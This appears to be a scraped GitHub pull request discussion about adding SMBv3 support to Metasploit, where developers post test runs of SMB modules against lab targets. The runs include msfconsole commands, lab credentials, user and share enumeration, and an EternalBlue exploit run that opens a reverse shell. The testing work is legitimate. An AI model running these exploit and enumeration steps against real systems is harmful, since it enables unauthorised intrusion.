/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:67:in `run_host'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:117:in `block (2 levels) in run'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'

With a file

Setting a real file:

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$
set RPATH "mhope\azure.xml"

msf5 auxiliary(admin/smb/download_file) > run

[*] 10.10.10.172:445      - Connecting...
[*] 10.10.10.172:445      - 10.10.10.172:445     : Mounting the remote share \\10.10.10.172\users$'...
[*] 10.10.10.172:445      - Trying to download mhope\azure.xml...
[+] 10.10.10.172:445      - mhope\azure.xml saved as: /Users/adfoster/.msf4/loot/20200617134007_default_10.10.10.172_smb.shares.file_360440.xml
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Log:

[06/17/2020 13:40:06] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 13:40:06] [d(0)] core: Negotiated SMB version: SMB3

modules/auxiliary/admin/smb/list_directory

This module seems to fail due to needing smb 1 support?

metasploit-framework/modules/auxiliary/admin/smb/list_directory.rb

Line 59 in 37a55b1

connect(versions: [1])

set RHOSTS 10.10.10.172
set SMBUser SABatchJobs
set SMBPass SABatchJobs
set SMBSHARE users$

msf5 auxiliary(admin/smb/list_directory) > run
[*] Running module against 10.10.10.172

[*] 10.10.10.172:445 - Connecting to the server...
[-] 10.10.10.172:445 - Login Failed: Connection reset by peer
[*] Auxiliary module execution completed

[06/17/2020 13:50:07] [d(0)] core: SMB version(s) to negotiate: [1]

adfoster-r7 · 2020-06-17T13:47:37Z

modules/auxiliary/admin/smb/list_directory.rb

@@ -55,7 +56,7 @@ def as_size( s )
  def run
    print_status("Connecting to the server...")
    begin
-      connect()
+      connect(versions: [1])


Just for context; Why do we need to change this to version 1 here?

This module uses a method that is only implemented in the Rex SMB client (find_first). It also extracts information from the raw Rex response. Forcing to version 1 will ensure it will use Rex SMB client and not RubySMB client.
This module will need to be redesigned to be able to use RubySMB by default (like many others). This will be taken care of, in the next iteration of this project.

adfoster-r7 · 2020-06-17T13:55:34Z

I don't think it's a concern for this PR, but just as visibility I also tested this out with impacket's smb server and I wasn't able to connect successfully.

git clone https://github.com/SecureAuthCorp/impacket.git

After spinning up the server:

sudo pipenv run python examples/smbserver.py -debug -username test -password test test_share $(PWD)

I confirmed connecting with impacket’s client just fine:

$ pipenv run python examples/smbclient.py test:[email protected]
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# shares
IPC$
TEST_SHARE
# use TEST_SHARE
# ls
drw-rw-rw-        576  Wed Jun 10 20:14:23 2020 .
drw-rw-rw-       2048  Tue Jun 16 13:24:07 2020 ..
drw-rw-rw-       1440  Wed Jun 10 20:12:19 2020 impacket
-rw-rw-rw-       3550  Wed Jun 10 20:12:19 2020 LICENSE
-rw-rw-rw-        123  Wed Jun 10 20:12:19 2020 requirements.txt
-rw-rw-rw-      12399  Wed Jun 10 20:12:19 2020 ChangeLog
drw-rw-rw-        288  Wed Jun 10 20:12:19 2020 tests
-rw-rw-rw-        165  Wed Jun 10 20:12:19 2020 MANIFEST.in
-rw-rw-rw-       4101  Wed Jun 10 20:12:19 2020 README.md
-rw-rw-rw-        304  Wed Jun 10 20:13:14 2020 Pipfile
-rw-rw-rw-       2810  Wed Jun 10 20:12:19 2020 setup.py
-rw-rw-rw-        798  Wed Jun 10 20:12:19 2020 .gitignore
drw-rw-rw-       1664  Wed Jun 10 20:12:19 2020 examples
drw-rw-rw-         96  Wed Jun 10 20:12:19 2020 .github
-rw-rw-rw-        426  Wed Jun 10 20:12:19 2020 tox.ini
drw-rw-rw-        384  Wed Jun 17 10:58:16 2020 .git
-rw-rw-rw-        716  Wed Jun 10 20:12:19 2020 .travis.yml
-rw-rw-rw-      14836  Wed Jun 10 20:14:23 2020 Pipfile.lock

But msfconsole’s enum shares doesn’t work:

msf5 auxiliary(scanner/smb/smb_enumshares) > run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - Login Failed: incomplete "." on UTF-16LE
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I can’t immediately tell if that’s a problem with msfconsole or impacket server - I didn't look any further, but just posting for visibility 👍

adfoster-r7 · 2020-06-17T15:44:06Z

I was trying to download a file from a share with a ’ in the share name which gave me encoding issues, I imagine the problem exists with file names too.

Options:

msf5 auxiliary(admin/smb/download_file) > options

Module options (auxiliary/admin/smb/download_file):

   Name         Current Setting                  Required  Description
   ----         ---------------                  --------  -----------
   FILE_RPATHS                                   no        A file containing a list remote files relative to the share to operate on
   RHOSTS       127.0.0.1                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH        testing/hello_world.txt          no        The name of the remote file relative to the share to operate on
   RPORT        445                              yes       The SMB service port (TCP)
   SMBDomain    .                                no        The Windows domain to use for authentication
   SMBPass      test                             no        The password for the specified username
   SMBSHARE     Administrator’s Public Folder    yes       The name of a share on the RHOST
   SMBUser      test                             no        The username to authenticate as
   THREADS      1                                yes       The number of concurrent threads (max one per host)

Result:

msf5 auxiliary(admin/smb/download_file) > run

[*] 127.0.0.1:445         - Connecting...
[*] 127.0.0.1:445         - 127.0.0.1:445        : Mounting the remote share \\127.0.0.1\Administrator’s Public Folder'...
[*] 127.0.0.1:445         - Error: 127.0.0.1: Encoding::UndefinedConversionError "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[*] 127.0.0.1:445         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Backtrace

==> /Users/adfoster/.msf4/logs/framework.log <==
[06/17/2020 16:42:15] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/17/2020 16:42:15] [d(0)] core: Negotiated SMB version: SMB3
[06/17/2020 16:42:15] [e(0)] core: Error running against host 127.0.0.1: "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/field/string16.rb:6:in `encode'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/field/string16.rb:6:in `assign'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/gems/bindata-2.4.7/lib/bindata/struct.rb:190:in `block in define_field_accessors_for'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client/tree_connect.rb:58:in `smb2_tree_connect'
/Users/adfoster/.rvm/gems/ruby-2.6.6@metasploit-framework/bundler/gems/ruby_smb-183d47aae4c4/lib/ruby_smb/client.rb:509:in `tree_connect'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/proto/smb/simpleclient.rb:176:in `connect'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:41:in `smb_download'
/Users/adfoster/Documents/code/metasploit-framework/modules/auxiliary/admin/smb/download_file.rb:67:in `run_host'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:117:in `block (2 levels) in run'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'

adfoster-r7 · 2020-06-18T12:50:46Z

Windows 7 testing

Testing SMB v1 + v2 on windows 7 target

| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-18T06:21:16-05:00

From tryhackme's blue box

set RHOST 10.10.62.226
set SMBUser Jon
set SMBPass alqfna22

Pass

exploit/windows/smb/ms17_010_eternalblue

After a couple of fails, eventually a win:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.12.2:4444 
[*] 10.10.62.226:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 10.10.62.226:445      - Connected to \\10.10.62.226\IPC$ with TID = 2048
[*] 10.10.62.226:445      - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] 10.10.62.226:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.226:445 - Connecting to target for exploitation.
[+] 10.10.62.226:445 - Connection established for exploitation.
[+] 10.10.62.226:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.226:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.226:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.226:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.226:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.226:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.226:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.226:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.226:445 - Sending NT Trans Request packet
[*] 10.10.62.226:445 - Making :eb_trans2_zero packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Making :eb_trans2_buffer packet
[*] 10.10.62.226:445 - Sending malformed Trans2 packets
[*] 10.10.62.226:445 - Starting non-paged pool grooming
[*] 10.10.62.226:445 - Sending start free hole packet.
[+] 10.10.62.226:445 - Sending SMBv2 buffers
[*] 10.10.62.226:445 - Sending end free hole packet.
[+] 10.10.62.226:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.226:445 - Sending final SMBv2 buffers.
[*] 10.10.62.226:445 - Sending last fragment of exploit packet!
[*] 10.10.62.226:445 - Making :eb_trans2_exploit packet
[*] 10.10.62.226:445 - Receiving response from exploit packet
[+] 10.10.62.226:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.226:445 - Sending egg to corrupted connection.
[*] 10.10.62.226:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.11.12.2:4444 -> 10.10.62.226:49190) at 2020-06-18 12:30:44 +0100
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.226:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

scanner/smb/smb_enumusers

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.62.226:445      - JON-PC [ Administrator, Guest, Jon ] ( LockoutTries=0 PasswordMin=0 )
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumshares

msf5 auxiliary(scanner/smb/smb_enumshares) > run

[-] 10.10.62.226:139      - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.10.62.226:445      - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 10.10.62.226:445      - peer_native_lm is only available with SMB1 (current version: SMB2)
[+] 10.10.62.226:445      - ADMIN$ - (DISK) Remote Admin
[+] 10.10.62.226:445      - C$ - (DISK) Default share
[+] 10.10.62.226:445      - IPC$ - (IPC) Remote IPC
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_ms17_010

Success

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 10.10.62.226:445      - Connected to \\10.10.62.226\IPC$ with TID = 2048
[*] 10.10.62.226:445      - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[+] 10.10.62.226:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

auxiliary/scanner/smb/smb_login

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.62.226:445      - 10.10.62.226:445 - Starting SMB login bruteforce
[+] 10.10.62.226:445      - 10.10.62.226:445 - Success: '.\Jon:alqfna22'
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Fail

scanner/smb/smb_enumusers_domain

Failed

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enum_gpp

Failed

msf5 auxiliary(scanner/smb/smb_enum_gpp) > run

[*] 10.10.62.226:445      - Connecting to the server...
[*] 10.10.62.226:445      - Mounting the remote share \\10.10.62.226\SYSVOL'...
[-] 10.10.62.226:445      - 10.10.62.226: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cdelafuente-r7 · 2020-06-18T15:00:50Z

I don't think it's a concern for this PR, but just as visibility I also tested this out with impacket's smb server and I wasn't able to connect successfully.

I ran some tests and found out that the Net::Client::NTLM library we are using is not dealing very well with OEM encoding. This does not cause any issue with Windows/Mac/Samba etc. since they all require Unicode, which is the default (they don't even advertise OEM support anymore). However, impacket seems to use the encoding requirements from the client request and copy it to the response he sends back. As a consequence, Net::Client::NTLM feels like it would be better to use OEM encoding instead os Unicode and fails.
I updated RubySMB library to force Net::Client::NTLM to only require Unicode.

However, this is not enough to have it working with impacket. This time, it looks like an impacket issue: it does not add the NtCreateAndxResponse extended information even if the client requires it. [MS-SMB] added this extension to the original CIFS protocol and it is the default now. This makes RubySMB fail when parsing the response, since it expects the extended information.

We can still update RubySMB to accept this and parse the response even if extended information is missing. But, I'm wondering if it is worth the effort since the issue looks like to be on the impacket side.

cdelafuente-r7 · 2020-06-18T15:24:36Z

I was trying to download a file from a share with a ’ in the share name which gave me encoding issues, I imagine the problem exists with file names too.

I couldn't reproduce the issue with a share name containing a quote. However, I checked the single quote from your comment and it is actually a weird encoded character: "\xE2\x80\x99". Did you copy/paste this share name directly in msf console? Please, can you try again typing the share name and see if you still have the issue?

adfoster-r7 · 2020-06-18T15:45:38Z

@cdelafuente-r7 OSX has a habbit of using ’ over '. I think the underlying issue is string encoding issues, but I'll double check that too

cdelafuente-r7 · 2020-06-18T16:38:30Z

@adfoster-r7, thanks again for testing.

Regarding the failed tests against Window 7:

scanner/smb/smb_enumusers_domain

Failed

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 10.10.62.226:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This module seems to work when testing against 445/TCP. The error message is related to the first try against 139/TCP (NetBios). The module does not set SimpleClient.direct to false, which disables the NetBios session creation, and fails.
I got it working on 139/TCP by disabling SMBDirect and setting the correct NetBios name:

msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 172.16.60.134:445     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[*] 172.16.60.134:445     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[+] 172.16.60.134:445     - Found user: WIN7-DEV\nutmeg
[*] 172.16.60.134:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > set SMBDirect false
SMBDirect => false
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > set SMBName Win7-dev
SMBName => Win7-dev
msf5 auxiliary(scanner/smb/smb_enumusers_domain) > run

[*] 172.16.60.134:139     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[*] 172.16.60.134:139     - WIN7-DEV\nutmeg	(logon_server: WIN7-DEV, other_domains: )
[+] 172.16.60.134:139     - Found user: WIN7-DEV\nutmeg
[*] 172.16.60.134:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enum_gpp

Failed

msf5 auxiliary(scanner/smb/smb_enum_gpp) > run

[*] 10.10.62.226:445      - Connecting to the server...
[*] 10.10.62.226:445      - Mounting the remote share \\10.10.62.226\SYSVOL'...
[-] 10.10.62.226:445      - 10.10.62.226: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[*] 10.10.62.226:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This module is set to use Rex SMB client only. This error shows that the SYSVOL share does not exist on this target.

All these old modules will need to be redesigned/refactored to be able to use RubySMB by default.

cdelafuente-r7 · 2020-06-18T16:54:07Z

@cdelafuente-r7 OSX has a habbit of using ’ over '. I think the underlying issue is string encoding issues, but I'll double check that too

That's interesting, I got different results if I run a Pry session directly or within MSF:

$ pry
[1] pry(main)> require 'ruby_smb'
=> true
[2] pry(main)> RubySMB::Field::String16.new('’')
=> "\u2019"

msf5 auxiliary(scanner/smb/smb_enum_gpp) > pry
[*] Starting Pry shell...
[*] You are in auxiliary/scanner/smb/smb_enum_gpp

[1] pry(#<Msf::Modules::Auxiliary__Scanner__Smb__Smb_enum_gpp::MetasploitModule>)> RubySMB::Field::String16.new('’')
Encoding::UndefinedConversionError: "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
from /Users/cdelafuente/dev/src/ruby_smb/lib/ruby_smb/field/string16.rb:6:in `encode'

bwatters-r7 · 2020-06-22T18:22:50Z

OK..... here are some older OSs for backward compatibility....

msf5 auxiliary(scanner/smb/smb_enumusers) > set smb::protocolversion 1,2,3 
smb::protocolversion => 1,2,3
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.132.0/24:     - Scanned  27 of 256 hosts (10% complete)
[*] 192.168.132.0/24:     - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.132.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.132.103:445   - WIN2K3X86-R2 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.104:445   - WIN2K3X86-R2-SP [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.132.0/24:     - Scanned 107 of 256 hosts (41% complete)
[+] 192.168.132.115:445   - WIN2K3X86 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.114:445   - WIN2K3X64-SP1 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.116:445   - WIN2K3X86-SP1 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.132.0/24:     - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.132.0/24:     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.132.0/24:     - Scanned 180 of 256 hosts (70% complete)
[*] 192.168.132.0/24:     - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.132.0/24:     - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.132.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

bwatters-r7 · 2020-06-22T19:20:48Z

I believe I have it working for Windows XP....

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.132.147:445   - WINXP-SP3 [  ] 
[*] 192.168.132.147:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

Not much info, but the handshake looks good:

It does not return any users, but neither does the master branch?

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.132.147:445   - WINXP-SP3 [  ] 
[*] 192.168.132.147:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

bwatters-r7 · 2020-06-22T19:29:23Z

Windows 2000 SP3 does not appear to work (this is not a regression, as it does the exact same thing on master):

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.132.196:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

The password I'm using is correct and I can browse a fileshare hosted on this VM from a Windows XP VM using the username/password I proved the scanner.

smcintyre-r7 · 2020-06-24T18:12:10Z

It looks like all outstanding issues have been resolved. I updated the Gemfile.lock in commit d3a59dc to incorporate RubySMB 2.0.2 which includes a couple of bug fixes that surfaced from this testing. I also verified that the good 'ol MS08-067 is still working.

I'm going to go ahead and merge this into 6.x. Thanks @cdelafuente-r7 for all of your work on this and thanks to everyone who helped test it out!

smcintyre-r7 · 2020-06-24T18:16:38Z

Release Notes

Added SMB v3 support for client operations to the Metasploit Framework. Modules which already used the new SMB client will now be capable of connecting to servers with all three SMB v3 dialects (3.0, 3.0.2, 3.1.1). In cases where an SMB 3.x dialect is negotiated, the default behavior will be to encrypt the communications to the server (users can disable this by setting SMB::AlwaysEncrypt to false).

cdelafuente-r7 added enhancement rubysmb blocked Blocked by one or more additional tasks labels May 11, 2020

cdelafuente-r7 marked this pull request as ready for review May 13, 2020 15:15

cdelafuente-r7 changed the title ~~WIP: SMBv3 integration with Framework~~ SMBv3 integration with Framework May 13, 2020

cdelafuente-r7 force-pushed the smb3_integration branch from 73e1408 to 6bff45c Compare May 15, 2020 10:08

cdelafuente-r7 changed the base branch from master to 6.x May 28, 2020 17:22

smcintyre-r7 self-assigned this Jun 8, 2020

cdelafuente-r7 removed the blocked Blocked by one or more additional tasks label Jun 8, 2020

smcintyre-r7 approved these changes Jun 8, 2020

View reviewed changes

bwatters-r7 added the msf6 PRs that need to be landed into the msf 6 branch label Jun 8, 2020

jmartin-tech force-pushed the 6.x branch from 88d42f5 to ef0314d Compare June 8, 2020 22:48

cdelafuente-r7 added 14 commits June 9, 2020 14:18

Fix ms17_010_eternalblue

79e52d1

Update SMB Client and SimpleClient

6ab47eb

- multiple protocol version negotiation - SMB 1, 2 and 3 by default - add SMB::ProtocolVersion option to SMB Client mixin

Update exploit/windows/smb/psexec

360d380

Update SMB client

474d7eb

- Add SMB::AlwaysEncrypt option - Force SMB1 for SMB fingerprint - Update smb_netshareenumall

Update modules

31a117f

- smb_ms17_010.rb - psexec_ms17_010.rb - psexec_psh.rb - smb_enumshares.rb

Improve client error/warning/debug messages

04a44d2

Update modules

2f873fe

- modules/auxiliary/scanner/smb/smb_enumshares.rb - modules/exploits/linux/samba/setinfopolicy_heap.rb - modules/exploits/linux/samba/trans2open.rb - modules/exploits/multi/samba/usermap_script.rb - modules/exploits/windows/smb/ipass_pipe_exec.rb

Update SimpleClient #open logic for RubySMB

24c20fe

Update modules

0bb93b4

- ms17_010_command and ms17_010_psexec: deregister SMB::ProtocolVersion option - client: update error handling - is_known_pipename: force SMB1 only for #enumerate_directories and update error handling

Update some libraries and modules

a9a1d01

Fix typo

3580ac1

Update last batch of modules

9f2a29d

Update auxiliary/admin/smb/delete_file module

cfc7c48

Improvements from code review

98ac51d

adfoster-r7 reviewed Jun 17, 2020

View reviewed changes

cdelafuente-r7 mentioned this pull request Jun 17, 2020

Fixes and improvements from MSF code review rapid7/ruby_smb#156

Merged

adfoster-r7 reviewed Jun 17, 2020

View reviewed changes

smcintyre-r7 merged commit 26cbfa5 into rapid7:6.x Jun 24, 2020

pbarry-r7 added the rn-enhancement release notes enhancement label Aug 18, 2020

FunnyWolf mentioned this pull request Sep 1, 2020

ms17_010_eternalblue Exploit completed, but no session was created #14055

Closed

SMBv3 integration with Framework #13417

SMBv3 integration with Framework #13417

Uh oh!

Conversation

cdelafuente-r7 commented May 7, 2020 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Verification Steps

Windows target setup

Samba target setup

Monitoring setup

Tests

Uh oh!

jmartin-tech commented May 8, 2020

Uh oh!

jmartin-tech commented May 8, 2020

Uh oh!

smcintyre-r7 commented May 28, 2020

Uh oh!

cdelafuente-r7 commented May 28, 2020

Uh oh!

smcintyre-r7 left a comment

Choose a reason for hiding this comment

Uh oh!

smcintyre-r7 Jun 8, 2020

Choose a reason for hiding this comment

Uh oh!

cdelafuente-r7 Jun 9, 2020

Choose a reason for hiding this comment

Uh oh!

cdelafuente-r7 Jun 9, 2020

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

bwatters-r7 commented Jun 10, 2020

Uh oh!

bwatters-r7 commented Jun 10, 2020

Uh oh!

cdelafuente-r7 commented Jun 12, 2020

Uh oh!

bwatters-r7 commented Jun 12, 2020

Uh oh!

cdelafuente-r7 commented Jun 12, 2020

Uh oh!

bwatters-r7 commented Jun 12, 2020

Uh oh!

adfoster-r7 commented Jun 15, 2020

Target

Target

scanner/smb/smb_enumshares

scanner/smb/smb_enumusers

scanner/smb/smb_login

scanner/smb/smb_version

smb_checks.rc

Uh oh!

cdelafuente-r7 commented Jun 16, 2020 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

adfoster-r7 Jun 17, 2020

Choose a reason for hiding this comment

Uh oh!

cdelafuente-r7 Jun 17, 2020

Choose a reason for hiding this comment

Uh oh!

smcintyre-r7 Jun 19, 2020

Choose a reason for hiding this comment

Uh oh!

cdelafuente-r7 commented Jun 17, 2020

Uh oh!

adfoster-r7 commented Jun 17, 2020

admin/smb/check_dir_file

admin/smb/download_file

With a folder

With a file

modules/auxiliary/admin/smb/list_directory

Uh oh!

adfoster-r7 Jun 17, 2020 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

cdelafuente-r7 commented May 7, 2020 •

edited

Loading

cdelafuente-r7 commented Jun 16, 2020 •

edited

Loading

adfoster-r7 Jun 17, 2020 •

edited

Loading

cdelafuente-r7 commented Jun 18, 2020 •

edited

Loading

smcintyre-r7 commented Jun 24, 2020 •

edited by pbarry-r7

Loading